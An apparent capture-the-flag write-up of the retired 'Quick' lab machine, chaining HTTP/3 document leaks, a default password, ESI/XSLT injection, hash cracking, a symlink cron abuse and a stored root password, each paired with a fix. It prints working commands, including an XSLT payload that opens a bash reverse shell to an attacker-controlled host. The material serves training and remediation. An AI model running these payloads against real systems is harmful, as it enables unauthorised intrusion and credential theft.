Quick
Summary
Target quick.htb ($TARGET) was fully compromised by chaining six misconfigurations. An HTTP/3-only customer portal — invisible to standard TCP scanners — served onboarding PDFs without authentication; those PDFs leaked a global default password and a list of client email addresses.
Logging in with that credential reached a ticket system whose Esigate reverse-proxy layer blindly processed my own Edge Side Includes tags in ticket message bodies, enabling server-side remote code execution as the web user sam and capturing the user flag. From sam, a PHP source file in the web root exposed hardcoded MySQL credentials; the resulting database query returned srvadm's MD5 password hash, cracked offline in seconds.
Authenticated as srvadm to a second, vhost-gated POS Print Server console, I exploited a world-writable job-spool directory: a symlink planted before the cron-driven job processor ran caused it to write my own content through the symlink into srvadm's SSH authorized_keys file, yielding an SSH shell as srvadm. Finally, a connection-string config file cached in srvadm's home directory stored the root account password in URL-percent-encoded form; decoding it and running su root produced a root shell and the root flag.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export ATTACKER_IP="<your-vpn-address>"
export PASSWORD2="<a-password-you-choose>"
export PASSWORD4="<a-password-you-choose>"
export PASSWORD5="<a-password-you-choose>"
export PASSWORD7="<a-password-you-choose>"
export PASSWORD8="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 4
echo "$TARGET portal.quick.htb quick.htb" | sudo tee -a /etc/hostsnmap -Pn -p- --min-rate 3000 -T4 $TARGETnmap -Pn -sU --top-ports 100 -T4 $TARGETcurl -sk --http3-only --resolve portal.quick.htb:443:$TARGET https://portal.quick.htb/Exact commands 3
curl -sk --http3-only --resolve portal.quick.htb:443:$TARGET 'https://portal.quick.htb/index.php?view=docs'curl -sk --http3-only --resolve portal.quick.htb:443:$TARGET 'https://portal.quick.htb/Connectivity.pdf' -o Connectivity.pdfcurl -sk --http3-only --resolve portal.quick.htb:443:$TARGET 'https://portal.quick.htb/QuickStart.pdf' -o QuickStart.pdfFixRequire authentication before serving any customer documentHigh
Exact commands 1
curl -si -c cookies.txt -d 'email=elisa%40wink.co.uk&password=$PASSWORD2' http://$TARGET:9001/login.phpFixEliminate the shared default password and enforce a unique first-login credentialCritical
Exact commands 5
mkdir -p /tmp/esi && cat > /tmp/esi/x.xsl <<'EOF'
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
<xsl:template match="/">
<xsl:variable name="cmd" select="'bash -c &apos;bash -i >& /dev/tcp/$ATTACKER_IP/9100 0>&1&apos;'"/>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
<xsl:value-of select="ob:toString($process)"/>
</xsl:template>
</xsl:stylesheet>
EOF
cat > /tmp/esi/x.xml <<'EOF'
<?xml version="1.0"?><root>trigger</root>
EOFcd /tmp/esi && python3 -m http.server 8000 &nc -lvnp 9100curl -s -b cookies.txt --data-urlencode 'title=test' --data-urlencode 'msg=<esi:include src="http://$ATTACKER_IP:8000/x.xml" stylesheet="http://$ATTACKER_IP:8000/x.xsl"></esi:include>' --data-urlencode 'submit=1' http://$TARGET:9001/ticket.phpcat /home/sam/user.txtFixDisable or isolate ESI processing so user-submitted content cannot trigger itCritical
Exact commands 3
cat /var/www/printer/db.phpmysql -u db_adm -p$PASSWORD4 quick -e 'SELECT * FROM users;'echo '<srvadm_md5_hash>' > /tmp/hashes.txt && hashcat -m 0 /tmp/hashes.txt /usr/share/wordlists/rockyou.txt --forceFixRemove plaintext credentials from source files and replace MD5 password hashingCritical
Exact commands 6
curl -si -c pc.txt -H 'Host: printerv2.quick.htb' --data-urlencode 'email=srvadm@quick.htb' --data-urlencode 'password=$PASSWORD5' http://127.0.0.1/index.phpcurl -s -b pc.txt -H 'Host: printerv2.quick.htb' 'http://127.0.0.1/add_printer.php' --data-urlencode 'printer_name=evil' --data-urlencode "ip=$ATTACKER_IP" --data-urlencode 'port=9100' --data-urlencode 'port_type=9100'ssh-keygen -t rsa -f /tmp/srvkey -N '' && cat /tmp/srvkey.pubmkdir -p /home/srvadm/.ssh && curl -s -b pc.txt -H 'Host: printerv2.quick.htb' 'http://127.0.0.1/job.php' --data-urlencode 'printer=evil' --data-urlencode 'data=<SSH_PUBKEY_CONTENT>'JOB_FILE=$(ls -t /var/www/jobs/ | head -1) && ln -sf /home/srvadm/.ssh/authorized_keys /var/www/jobs/$JOB_FILEssh -i /tmp/srvkey -o StrictHostKeyChecking=no srvadm@127.0.0.1FixLock down the print job spool directory and prevent the cron processor from following symlinksHigh
Exact commands 3
grep -ERni 'password\|pass\|secret\|root' ~/.cache 2>/dev/nullpython3 -c "import urllib.parse; print(urllib.parse.unquote('$PASSWORD7'))"cat > /tmp/suroot.py <<'PYEOF'
import pty,os,sys,time,select
pid,fd=pty.fork()
if pid==0:
os.execvp("su",["su","-","root","-c","id; cat /root/root.txt"])
else:
time.sleep(0.7); os.write(fd,b"$PASSWORD8\n")
buf=b""
while True:
r,_,_=select.select([fd],[],[],7)
if not r: break
try: d=os.read(fd,4096)
except OSError: break
if not d: break
buf+=d
sys.stdout.write(buf.decode("utf-8","ignore"))
PYEOF
python3 /tmp/suroot.pyFixRemove stored plaintext credentials from user home-directory config filesCritical
Attack patterns used
The transferable techniques behind this compromise.
Cron Job AbuseLinux · Privilege EscalationT1053.003
What it is
Scheduled tasks running as root that invoke a writable script, a wildcard, or a relative path can be hijacked. Watching processes with pspy (no root needed) reveals cron jobs; if the executed file or its directory is writable, an unauthorised user overwrites it with a payload that runs at the next interval as root.
Why it works
Cron jobs are written for convenience and often reference world-writable paths or use unsafe wildcards (tar *). Remediate with absolute paths, restrictive permissions on scripts, and avoiding shell wildcards in privileged cron jobs.
Read more
Exposed services
| 22/tcp | ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) |
| 9001/tcp | http Apache httpd 2.4.29 ((Ubuntu)) |